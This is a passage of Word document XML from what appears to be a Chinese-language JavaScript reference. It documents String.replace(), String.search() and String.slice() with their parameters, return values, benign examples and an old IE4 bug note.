        <w:t>String.replace()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="763"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>替换匹配给定正则表达式的（一个或多个）子串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.replace(regexp,replacement)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定了要替换的模式的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果这个参数是一个字符串，它将用做一个要搜索的直接量文本模式；它将不会先转化为</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replacement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个内容为替换</w:t>
      </w:r>
      <w:r>
        <w:t>文本的字符串，或者一个函数，用于在调用时生成对应的替换文本。细节可参阅描述部分。</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一个新的字符串，其中匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个或所有的地方已替换为</w:t>
      </w:r>
      <w:r>
        <w:t>replacement</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replace()</w:t>
      </w:r>
      <w:r>
        <w:t>在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>上执行查找与替换的操作。它在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中搜索一个或多个匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的子串并使用</w:t>
      </w:r>
      <w:r>
        <w:t>replacement</w:t>
      </w:r>
      <w:r>
        <w:t>替换。如果</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>指定全局属性</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>将替换所有匹配的子串。在其他情况下，它只替换第一个匹配的子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replacement</w:t>
      </w:r>
      <w:r>
        <w:t>可以是一个字符串或一个函数。如果它是一个字符串，则每个匹配子串都将替换为该子串。注意</w:t>
      </w:r>
      <w:r>
        <w:t>replacement</w:t>
      </w:r>
      <w:r>
        <w:t>字符串中的</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>字符有特殊含义。就像下表显示的，它表示模式匹配中的一个字符串将在替换中使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251746304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4144992" cy="1250830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91" name="00091.jpeg" descr="000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1.jpeg" descr="00091.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4144992" cy="1250830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>版定义</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>replacement</w:t>
      </w:r>
      <w:r>
        <w:t>参数可以用一个函数来代替字符串。在使用函数的情况下，这个函数将在每个匹配结果上调用，它返回的字符串则将作为替换文本。传入该函数的第一个参数是匹配该模式的字符串。接下来的参数是匹</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>配该模式中的某个圆括号子表达式的字符串，</w:t>
      </w:r>
      <w:r>
        <w:t>可能有</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个这样的参数。下一个参数则是一个整数，指定</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>中出现匹配结果的位置，最后一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>确保单词</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>的大小写是正确的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.replace(/javascript/i,"JavaScript");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个单独的名字从格式</w:t>
      </w:r>
      <w:r>
        <w:t>"Doe,John"</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>"John Done"</w:t>
      </w:r>
      <w:r>
        <w:t>格式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name.replace(/(\w+)\s*,\s*(\w+)/,"$2$1");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将所有双引号替换为成对的前后单引号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.replace(/"([^"]*)"/g,"''$1''");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串中所有单词的首字母大写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.replace(/\b\w+\b/g,function(word){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return word.substring(0,1).toUpperCase()+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>word.substring(1);</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RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.test()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.search()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="764" w:name="String_search__"/>
      <w:r>
        <w:t>String.search()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="764"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>一个正则表达式查找</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.search(regexp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，指定要在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中查找的模式。如果这个参数不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>，它将先传入</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，后转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</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string</w:t>
      </w:r>
      <w:r>
        <w:t>中第一个匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的子串的开始位置，如果没有找到匹配则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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search()</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中寻找匹配</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的子串，并返回匹配子串的第一个字符的位置，如果没有找到则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>search()</w:t>
      </w:r>
      <w:r>
        <w:t>不执行全局匹配，它会忽略</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>标志。它也会忽略</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性，总是从</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的开始位置开始搜索，这意味着它总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中第一个匹配子串的位置。</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s="JavaScript is fun";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.search(/script/i)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.search(/a(.)a/)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1</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RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.test()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="765" w:name="String_slice__"/>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>.slice()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="765"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>提取一个子串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.slice(start,end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>切片开始的字符串索引。如果为负，则将从该字符串的尾部开始计算。也就是说，</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>表示最后一个字符，</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:t>表示倒数第二个字符，以此类推。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>紧跟着切片结尾的字符串索引。如果不指定，则切片将包括从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>到当前字符串结尾的所有字符。如果这个参数是负的，则将从该字符串的尾部开始计算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新的字符串，内容为</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中自</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置开始并且包含</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置，直到但不包含</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>位置的所有字符。</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slice()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个字符串，内容为</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的一个切片或子串。它不修改</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>的方法</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t>以及弃用的</w:t>
      </w:r>
      <w:r>
        <w:t>substr()</w:t>
      </w:r>
      <w:r>
        <w:t>都返回一个字符串的指定部分。</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t>更灵活，因为它允许负参数值。</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>substr()</w:t>
      </w:r>
      <w:r>
        <w:t>的不同之处是，前者通过两个字符位置来定义一个子串，而后者使用一个位置和一个长度。也请注意，</w:t>
      </w:r>
      <w:r>
        <w:t>String.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Array.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>非常类似。</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s="abcdefg";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slic</w:t>
      </w:r>
      <w:r>
        <w:t>e(0,4)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"abcd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slice(2,4)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"cd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slice(4)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"efg"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slice(3,-1)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"def"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slice(3,-2)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"de"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.slice(-3,-1)//</w:t>
      </w:r>
      <w:r>
        <w:t>应该返回</w:t>
      </w:r>
      <w:r>
        <w:t>"ef"</w:t>
      </w:r>
      <w:r>
        <w:t>；但在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 4</w:t>
      </w:r>
      <w:r>
        <w:t>中返回</w:t>
      </w:r>
      <w:r>
        <w:t>"abcdef"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE4</w:t>
      </w:r>
      <w:r>
        <w:t>中如果</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>为负数将出现错误（不过之后的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>版本中没有这个问题）。它不是从字符串的尾部开始计算，而是从位置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的字符开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Array.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
